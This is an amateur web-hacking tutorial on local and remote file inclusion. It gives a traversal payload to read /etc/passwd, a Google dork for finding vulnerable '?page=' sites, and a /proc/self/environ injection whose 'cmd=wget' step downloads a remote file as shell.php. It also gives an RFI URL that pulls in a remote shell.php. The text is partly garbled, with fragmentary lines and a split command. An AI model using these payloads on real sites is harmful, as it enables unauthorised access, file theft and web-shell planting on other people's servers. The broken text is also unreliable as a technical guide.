LFI & RFI

LFI And RFI Are The Website Hacking Vulnerabilities

LFI- local file inclusion

Its  include the file of the server in our browser..

To see if a script is vulnerable to local file inclusion,

index.php?page=../../../../../../../../../etc/passwd

That Shows the complete User information in that server with paths..

Where ../ causes the script to move up one directoryWhere directory,

Multiple ../ cause the script to move to the top level directory (/, the root of the

filesystem) and /etc/passwd is the Unix passwd file.

google dork: inurl:.php?page=

example:www.xxx.com/contacts.php?page=abc.php

test:www.xxx.com/contacts.php?page=../xyz.php

now in linux server server there is etc/password

1... www.xyz.com/index

../

=../../../etc/passwd

=../../../etc/passwd

etc/passwdfile (google)

proc/self/environ is the writable file by end

or var/log/httpd-access.log is also writable

proc/self/environ

add one- user agent switcher

config.php

../proc/self//environ&cmd=wget http://

t35.com/abc.txt O shell.php

config.php

ip

username

pwd

Done..

RFI - Remote file inclusion

Remote File Inclusion (RFI) is a type of vulnerability most often found on websites.

It allows an attacker to include a remote file, usually through a script on the web

server. The vulnerability occurs due to the use of user-supplied input without

proper validation. This can lead to something as minimal as outputting the contents

 of the  file, but depending on the severity, to list a few it can lead to:

    ->  Code execution on the web server

   ->  Code execution on the client-side such as JavaScript which can lead to other

     attacks such as cross site scripting (XSS).

   -> Denial of Service (DoS)

   -> Data Theft/Manipulation

By default allow_url_include is ON -----> in php.ini

www.xxx.com/contacts.php?page=http://www.abc.com/shell.php
Video Tutorials

LFI and RFI Tutorial

LFI Tutorial:

RFI Tutorial: